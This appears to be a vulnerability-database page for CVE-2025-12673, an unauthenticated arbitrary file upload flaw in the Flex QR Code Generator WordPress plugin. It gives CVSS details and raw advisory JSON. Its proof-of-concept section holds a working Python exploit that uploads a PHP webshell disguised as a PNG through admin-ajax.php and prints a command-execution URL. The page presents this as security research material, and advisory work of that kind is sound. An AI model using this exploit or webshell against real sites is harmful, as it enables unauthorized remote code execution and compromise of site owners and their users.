Security Vulnerability Report
中文
CVE-2025-12673 CVSS 9.8 CRITICAL

CVE-2025-12673

Published: 2025-12-06 06:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_qr_code() function in all versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Flex QR Code Generator <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12673 PoC - Flex QR Code Generator Arbitrary File Upload # Target: WordPress site with Flex QR Code Generator plugin <= 1.2.7 target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # PHP webshell content webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" # Construct multipart form data files = { 'qr_code_image': ('shell.php', webshell, 'image/png') } # Send upload request to vulnerable endpoint url = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': 'update_qr_code', 'security': '任意值' } try: response = requests.post(url, data=data, files=files, timeout=10) if response.status_code == 200: print('[+] File uploaded successfully!') print(f'[+] Webshell location: {target_url}/wp-content/uploads/qr_codes/shell.php?cmd=whoami') else: print('[-] Upload failed') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12673", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:50.233", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_qr_code() function in all versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12673", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L457", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3412218", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12673/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d71404e-0db8-485b-a626-5e0df2076c05?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.